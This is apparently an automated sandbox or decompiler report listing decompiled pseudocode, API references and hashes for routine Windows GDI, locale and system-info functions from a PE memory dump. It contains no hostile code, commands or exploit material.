                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t25;
                                                                                
                                                                                				_v8 = __eax;
                                                                                				_t22 =  *__edx;
                                                                                				_t26 = _t22 - 0x113;
                                                                                				if(_t22 != 0x113) {
                                                                                					_push( *((intOrPtr*)(__edx + 8)));
                                                                                					_push( *((intOrPtr*)(__edx + 4)));
                                                                                					_push(_t22);
                                                                                					_t12 =  *((intOrPtr*)(_v8 + 0x34));
                                                                                					_push(_t12);
                                                                                					L00406CF8();
                                                                                					 *((intOrPtr*)(__edx + 0xc)) = _t12;
                                                                                					return _t12;
                                                                                				}
                                                                                				_push(0x42d70a);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t25;
                                                                                				E004037B0(_v8, _t26);
                                                                                				_pop(_t21);
                                                                                				 *[fs:eax] = _t21;
                                                                                				return 0;
                                                                                			}









                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042D735
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: d3dc05b760a7179db27bac9aba668f17f96045aa3efb6cdb0bb9167c59736110
                                                                                • Instruction ID: 24ffc1f5cc5d95a3adb214a2426a373d53fe68e3b59a922a751631c511fbcaee
                                                                                • Opcode Fuzzy Hash: d3dc05b760a7179db27bac9aba668f17f96045aa3efb6cdb0bb9167c59736110
                                                                                • Instruction Fuzzy Hash: 90F06276A08214AFE740DF9AE891C56B7ECEB4976079140B6F904D7641D639AD008B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E004206A4(intOrPtr __eax, intOrPtr __edx) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v48;
                                                                                				struct _SYSTEM_INFO* _t17;
                                                                                				unsigned int _t20;
                                                                                				unsigned int _t22;
                                                                                				signed int _t31;
                                                                                				intOrPtr _t33;
                                                                                
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t17 =  &_v48;
                                                                                				GetSystemInfo(_t17);
                                                                                				_t33 = _v8;
                                                                                				_t31 = _v12 - 1;
                                                                                				if(_t31 >= 0) {
                                                                                					if( *((short*)( &_v48 + 0x20)) == 3) {
                                                                                						do {
                                                                                							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                                                                                							 *(_t33 + _t31 * 4) = _t20;
                                                                                							_t31 = _t31 - 1;
                                                                                						} while (_t31 >= 0);
                                                                                						return _t20;
                                                                                					} else {
                                                                                						goto L2;
                                                                                					}
                                                                                					do {
                                                                                						L2:
                                                                                						asm("bswap eax");
                                                                                						_t22 =  *(_t33 + _t31 * 4) >> 8;
                                                                                						 *(_t33 + _t31 * 4) = _t22;
                                                                                						_t31 = _t31 - 1;
                                                                                					} while (_t31 >= 0);
                                                                                					return _t22;
                                                                                				}
                                                                                				return _t17;
                                                                                			}












                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042394F), ref: 004206B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 31276548-0
                                                                                • Opcode ID: 447c2f892d63f2773f99d27ead267e30025e0794443dbd59af2307386bcd5138
                                                                                • Instruction ID: 2ef0218fa1a2a42b92b3f2a706405680a6ead4b34a17a53999630acefd0a4b62
                                                                                • Opcode Fuzzy Hash: 447c2f892d63f2773f99d27ead267e30025e0794443dbd59af2307386bcd5138
                                                                                • Instruction Fuzzy Hash: EBF0C2B1A0111D9FCB10DE98C48889CBBB4FA96301B81429AC404E7342EB74A960CB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409908(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                				char _v260;
                                                                                				intOrPtr _t10;
                                                                                				void* _t18;
                                                                                
                                                                                				_t18 = __ecx;
                                                                                				_t10 = _a4;
                                                                                				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                                                                					return E00404374(_t10, _t18);
                                                                                				}
                                                                                				return E00404410(_t10, _t5 - 1,  &_v260);
                                                                                			}







                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 5202cd03db26926967da58f514221db7739fdaffadadf0859e52d67bb909b61f
                                                                                • Instruction ID: 5b1fc041e3763898672b66fcce577b6e5d9180f283d58c81689c33e9adf3be77
                                                                                • Opcode Fuzzy Hash: 5202cd03db26926967da58f514221db7739fdaffadadf0859e52d67bb909b61f
                                                                                • Instruction Fuzzy Hash: 8BE092B270421416D321A5595C82EE6725C9798324F00427FBE49E73C2EDB49D8082A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00409954(int __eax, char __ecx, int __edx) {
                                                                                				char _v16;
                                                                                				char _t5;
                                                                                				char _t6;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_t6 = __ecx;
                                                                                				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                					_t5 = _t6;
                                                                                				} else {
                                                                                					_t5 = _v16;
                                                                                				}
                                                                                				return _t5;
                                                                                			}







                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AF96,00000000,0040B1AF,?,?,00000000,00000000), ref: 00409967
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: de28bee4d669a74db4c4310b33d6665fabe231cf5f91fa0509a38d358132e406
                                                                                • Instruction ID: fec70f45c09f919bf8d4f80a38a27b4653ab8aef86a33c50036d8b13c44d48c7
                                                                                • Opcode Fuzzy Hash: de28bee4d669a74db4c4310b33d6665fabe231cf5f91fa0509a38d358132e406
                                                                                • Instruction Fuzzy Hash: 55D05EA630E2503AE310555B2D85DBB9B9CCAC67A5F11403EB589D6352D6248C06D376
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040702E() {
                                                                                
                                                                                				goto ( *0x48854c);
                                                                                			}




                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 07a2badc39eab929b4c909af6923880a3e9ada41336aa77f29b2ddf5abd41f35
                                                                                • Instruction ID: 73fe5a0cc727686ef95d4fe4dc79a2b3cd0ba68317498fb9efdab86bfa820481
                                                                                • Opcode Fuzzy Hash: 07a2badc39eab929b4c909af6923880a3e9ada41336aa77f29b2ddf5abd41f35
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 52%
                                                                                			E00420360(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				char _v13;
                                                                                				struct HDC__* _v20;
                                                                                				void* _v24;
                                                                                				void* _v28;
                                                                                				long _v32;
                                                                                				long _v36;
                                                                                				intOrPtr _v40;
                                                                                				intOrPtr* _t78;
                                                                                				intOrPtr _t87;
                                                                                				struct HDC__* _t88;
                                                                                				intOrPtr _t91;
                                                                                				struct HDC__* _t92;
                                                                                				struct HDC__* _t135;
                                                                                				int _t162;
                                                                                				intOrPtr _t169;
                                                                                				intOrPtr _t171;
                                                                                				struct HDC__* _t173;
                                                                                				int _t175;
                                                                                				void* _t177;
                                                                                				void* _t178;
                                                                                				intOrPtr _t179;
                                                                                
                                                                                				_t177 = _t178;
                                                                                				_t179 = _t178 + 0xffffffdc;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t173 = __eax;
                                                                                				_t175 = _a16;
                                                                                				_t162 = _a20;
                                                                                				_v13 = 1;
                                                                                				_t78 =  *0x486dc8; // 0x46b0ac
                                                                                				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                                                                                					_v40 = 0;
                                                                                					_push(0);
                                                                                					L00406A58();
                                                                                					_v20 = E004201BC(0);
                                                                                					_push(_t177);
                                                                                					_push(0x4205e0);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t179;
                                                                                					_push(_t175);
                                                                                					_push(_t162);
                                                                                					_push(_a32);
                                                                                					L00406A50();
                                                                                					_v24 = E004201BC(_a32);
                                                                                					_v28 = SelectObject(_v20, _v24);
                                                                                					_push(0);
                                                                                					_t87 =  *0x487a28; // 0x510805d2
                                                                                					_push(_t87);
                                                                                					_t88 = _a32;
                                                                                					_push(_t88);
                                                                                					L00406BD0();
                                                                                					_v40 = _t88;
                                                                                					_push(0);
                                                                                					_push(_v40);
                                                                                					_push(_a32);
                                                                                					L00406BD0();
                                                                                					if(_v40 == 0) {
                                                                                						_push(0xffffffff);
                                                                                						_t91 =  *0x487a28; // 0x510805d2
                                                                                						_push(_t91);
                                                                                						_t92 = _v20;
                                                                                						_push(_t92);
                                                                                						L00406BD0();
                                                                                						_v40 = _t92;
                                                                                					} else {
                                                                                						_push(0xffffffff);
                                                                                						_push(_v40);
                                                                                						_t135 = _v20;
                                                                                						_push(_t135);
                                                                                						L00406BD0();
                                                                                						_v40 = _t135;
                                                                                					}
                                                                                					_push(_v20);
                                                                                					L00406BA0();
                                                                                					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                                                                                					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                                                                                					_v32 = SetTextColor(_t173, 0);
                                                                                					_v36 = SetBkColor(_t173, 0xffffff);
                                                                                					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                                                                                					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                                                                                					SetTextColor(_t173, _v32);
                                                                                					SetBkColor(_t173, _v36);
                                                                                					if(_v28 != 0) {
                                                                                						SelectObject(_v20, _v28);
                                                                                					}
                                                                                					DeleteObject(_v24);
                                                                                					_pop(_t169);
                                                                                					 *[fs:eax] = _t169;
                                                                                					_push(E004205E7);
                                                                                					if(_v40 != 0) {
                                                                                						_push(0);
                                                                                						_push(_v40);
                                                                                						_push(_v20);
                                                                                						L00406BD0();
                                                                                					}
                                                                                					return DeleteDC(_v20);
                                                                                				} else {
                                                                                					_push(1);
                                                                                					_push(1);
                                                                                					_push(_a32);
                                                                                					L00406A50();
                                                                                					_v24 = E004201BC(_a32);
                                                                                					_v24 = SelectObject(_a12, _v24);
                                                                                					_push(_t177);
                                                                                					_push(0x420433);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t179;
                                                                                					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407250(0xaa0029, 0xcc0020));
                                                                                					_pop(_t171);
                                                                                					 *[fs:eax] = _t171;
                                                                                					_push(E004205E7);
                                                                                					_v24 = SelectObject(_a12, _v24);
                                                                                					return DeleteObject(_v24);
                                                                                				}
                                                                                			}



























                                                                                APIs
                                                                                • 72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 004203A3
                                                                                • SelectObject.GDI32(?,?), ref: 004203B8
                                                                                • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0041F807,?,?,?,00000000,00000000,00420433,?,?), ref: 00420407
                                                                                • SelectObject.GDI32(?,?), ref: 00420421
                                                                                • DeleteObject.GDI32(?), ref: 0042042D
                                                                                • 72E7A590.GDI32(00000000,00000000,?,?), ref: 00420441
                                                                                • 72E7A520.GDI32(?,?,?,00000000,004205E0,?,00000000,00000000,?,?), ref: 00420462
                                                                                • SelectObject.GDI32(?,?), ref: 00420477
                                                                                • 72E7B410.GDI32(?,510805D2,00000000,?,?,?,?,?,00000000,004205E0,?,00000000,00000000,?,?), ref: 0042048B
                                                                                • 72E7B410.GDI32(?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000,004205E0,?,00000000,00000000), ref: 0042049D
                                                                                • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000,004205E0), ref: 004204B2
                                                                                • 72E7B410.GDI32(?,510805D2,000000FF,?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000,004205E0), ref: 004204C8
                                                                                • 72E7B150.GDI32(?,?,510805D2,000000FF,?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000), ref: 004204D4
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004204F6
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0041F807,?,?,00440328), ref: 00420518
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00420520
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0042052E
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0042055A
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0042057F
                                                                                • SetTextColor.GDI32(?,0041F807), ref: 00420589
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00420593
                                                                                • SelectObject.GDI32(?,00000000), ref: 004205A6
                                                                                • DeleteObject.GDI32(?), ref: 004205AF
                                                                                • 72E7B410.GDI32(?,00000000,00000000,004205E7,?,0041F807,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004205D1
                                                                                • DeleteDC.GDI32(?), ref: 004205DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                                • String ID:
                                                                                • API String ID: 3348367721-0
                                                                                • Opcode ID: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction ID: e8595f71b62ae0b459171dff56d3c2f5d04765a8323d631b6e7ee7ab11d0db60
                                                                                • Opcode Fuzzy Hash: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction Fuzzy Hash: 0B81B4B1A00219AFDB50EEA9CC81FAF77FCAB0D314F51441AF618F7281C278AD508B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 51%
                                                                                			E00423754(void* __eax, long __ecx, intOrPtr __edx) {
                                                                                				void* _v8;
                                                                                				intOrPtr _v12;
                                                                                				struct HDC__* _v16;
                                                                                				struct HDC__* _v20;
                                                                                				char _v21;
                                                                                				void* _v28;
                                                                                				void* _v32;
                                                                                				intOrPtr _v92;
                                                                                				intOrPtr _v96;
                                                                                				int _v108;
                                                                                				int _v112;
                                                                                				void _v116;
                                                                                				void* _t64;
                                                                                				int _t65;
                                                                                				intOrPtr _t66;
                                                                                				long _t77;
                                                                                				void* _t107;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t117;
                                                                                				long _t120;
                                                                                				intOrPtr _t123;
                                                                                				void* _t127;
                                                                                				void* _t129;
                                                                                				intOrPtr _t130;
                                                                                
                                                                                				_t127 = _t129;
                                                                                				_t130 = _t129 + 0xffffff90;
                                                                                				_t120 = __ecx;
                                                                                				_t123 = __edx;
                                                                                				_t107 = __eax;
                                                                                				_v8 = 0;
                                                                                				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                                                                					return _v8;
                                                                                				} else {
                                                                                					E00422C48(_t107);
                                                                                					_v12 = 0;
                                                                                					_v20 = 0;
                                                                                					_push(_t127);
                                                                                					_push(0x42394f);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t130;
                                                                                					_push(0);
                                                                                					L00406E20();
                                                                                					_v12 = E004201BC(0);
                                                                                					_push(_v12);
                                                                                					L00406A58();
                                                                                					_v20 = E004201BC(_v12);
                                                                                					_push(0);
                                                                                					_push(1);
                                                                                					_push(1);
                                                                                					_push(_v108);
                                                                                					_t64 = _v112;
                                                                                					_push(_t64);
                                                                                					L00406A40();
                                                                                					_v8 = _t64;
                                                                                					if(_v8 == 0) {
                                                                                						L18:
                                                                                						_t65 = 0;
                                                                                						_pop(_t116);
                                                                                						 *[fs:eax] = _t116;
                                                                                						_push(0x423956);
                                                                                						if(_v20 != 0) {
                                                                                							_t65 = DeleteDC(_v20);
                                                                                						}
                                                                                						if(_v12 != 0) {
                                                                                							_t66 = _v12;
                                                                                							_push(_t66);
                                                                                							_push(0);
                                                                                							L00407080();
                                                                                							return _t66;
                                                                                						}
                                                                                						return _t65;
                                                                                					} else {
                                                                                						_v32 = SelectObject(_v20, _v8);
                                                                                						if(__ecx != 0x1fffffff) {
                                                                                							_push(_v12);
                                                                                							L00406A58();
                                                                                							_v16 = E004201BC(_v12);
                                                                                							_push(_t127);
                                                                                							_push(0x423907);
                                                                                							_push( *[fs:eax]);
                                                                                							 *[fs:eax] = _t130;
                                                                                							if(_v96 == 0) {
                                                                                								_v21 = 0;
                                                                                							} else {
                                                                                								_v21 = 1;
                                                                                								_v92 = 0;
                                                                                								_t107 = E0042308C(_t107, _t123, _t123, 0,  &_v116);
                                                                                							}
                                                                                							_v28 = SelectObject(_v16, _t107);
                                                                                							if(_t123 != 0) {
                                                                                								_push(0);
                                                                                								_push(_t123);
                                                                                								_push(_v16);
                                                                                								L00406BD0();
                                                                                								_push(_v16);
                                                                                								L00406BA0();
                                                                                								_push(0);
                                                                                								_push(_t123);
                                                                                								_push(_v20);
                                                                                								L00406BD0();
                                                                                								_push(_v20);
                                                                                								L00406BA0();
                                                                                							}
                                                                                							_t77 = SetBkColor(_v16, _t120);
                                                                                							_push(0xcc0020);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(_v16);
                                                                                							_push(_v108);
                                                                                							_push(_v112);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(_v20);
                                                                                							L00406A30();
                                                                                							SetBkColor(_v16, _t77);
                                                                                							if(_v28 != 0) {
                                                                                								SelectObject(_v16, _v28);
                                                                                							}
                                                                                							if(_v21 != 0) {
                                                                                								DeleteObject(_t107);
                                                                                							}
                                                                                							_pop(_t117);
                                                                                							 *[fs:eax] = _t117;
                                                                                							_push(0x42390e);
                                                                                							return DeleteDC(_v16);
                                                                                						} else {
                                                                                							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                                                                							if(_v32 != 0) {
                                                                                								SelectObject(_v20, _v32);
                                                                                							}
                                                                                							goto L18;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,00000054,?), ref: 00423777
                                                                                • 72E7AC50.USER32(00000000,00000000,0042394F,?,00000000,?,?), ref: 004237A5
                                                                                • 72E7A590.GDI32(?,00000000,00000000,0042394F,?,00000000,?,?), ref: 004237B6
                                                                                • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0042394F,?,00000000,?,?), ref: 004237D1
                                                                                • SelectObject.GDI32(?,00000000), ref: 004237EB
                                                                                • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042380D
                                                                                • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042394F,?,00000000,?,?), ref: 0042381B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00423863
                                                                                • 72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 00423876
                                                                                • 72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000,?,?,00000001,00000001), ref: 0042387F
                                                                                • 72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000,?), ref: 0042388B
                                                                                • 72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000), ref: 00423894
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0042389E
                                                                                • 72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,00423907), ref: 004238C2
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004238CC
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004238DF
                                                                                • DeleteObject.GDI32(00000000), ref: 004238EB
                                                                                • DeleteDC.GDI32(00000000), ref: 00423901
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042391C
                                                                                • DeleteDC.GDI32(00000000), ref: 00423938
                                                                                • 72E7B380.USER32(00000000,00000000,00423956,00000001,00000000,?,00000000,00000000,0042394F,?,00000000,?,?), ref: 00423949
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                                                                • String ID:
                                                                                • API String ID: 4241548881-0
                                                                                • Opcode ID: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction ID: ad944dd91036beafc7ec954165db9b70d0383b0724a4ea5891ac7e38479d5bc1
                                                                                • Opcode Fuzzy Hash: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction Fuzzy Hash: A35162B1F00224ABDB10EFE9DC45BAEB7FCAB09704F51442AB114F7281C6BCA9508B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E00424550(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr* _v12;
                                                                                				void* _v16;
                                                                                				struct HDC__* _v20;
                                                                                				char _v24;
                                                                                				intOrPtr* _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				signed int _v37;
                                                                                				intOrPtr _v44;
                                                                                				void* _v48;
                                                                                				struct HDC__* _v52;
                                                                                				intOrPtr _v56;
                                                                                				intOrPtr* _v60;
                                                                                				intOrPtr* _v64;
                                                                                				short _v66;
                                                                                				short _v68;
                                                                                				signed short _v70;
                                                                                				signed short _v72;
                                                                                				void* _v76;
                                                                                				intOrPtr _v172;
                                                                                				char _v174;
                                                                                				intOrPtr _t150;
                                                                                				signed int _t160;
                                                                                				intOrPtr _t163;
                                                                                				void* _t166;
                                                                                				void* _t174;
                                                                                				void* _t183;
                                                                                				signed int _t188;
                                                                                				intOrPtr _t189;
                                                                                				struct HDC__* _t190;
                                                                                				struct HDC__* _t204;
                                                                                				signed int _t208;
                                                                                				signed short _t214;
                                                                                				intOrPtr _t241;
                                                                                				intOrPtr* _t245;
                                                                                				intOrPtr _t251;
                                                                                				intOrPtr _t289;
                                                                                				intOrPtr _t290;
                                                                                				intOrPtr _t295;
                                                                                				signed int _t297;
                                                                                				signed int _t317;
                                                                                				void* _t319;
                                                                                				void* _t320;
                                                                                				signed int _t321;
                                                                                				void* _t322;
                                                                                				void* _t323;
                                                                                				void* _t324;
                                                                                				intOrPtr _t325;
                                                                                
                                                                                				_t316 = __edi;
                                                                                				_t323 = _t324;
                                                                                				_t325 = _t324 + 0xffffff54;
                                                                                				_t319 = __ecx;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_v52 = 0;
                                                                                				_v44 = 0;
                                                                                				_v60 = 0;
                                                                                				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t322);
                                                                                				_v37 = _v36 == 0xc;
                                                                                				if(_v37 != 0) {
                                                                                					_v36 = 0x28;
                                                                                				}
                                                                                				_v28 = E0040272C(_v36 + 0x40c);
                                                                                				_v64 = _v28;
                                                                                				_push(_t323);
                                                                                				_push(0x424a6d);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t325;
                                                                                				_push(_t323);
                                                                                				_push(0x424a40);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t325;
                                                                                				if(_v37 == 0) {
                                                                                					 *((intOrPtr*)( *_v12 + 8))();
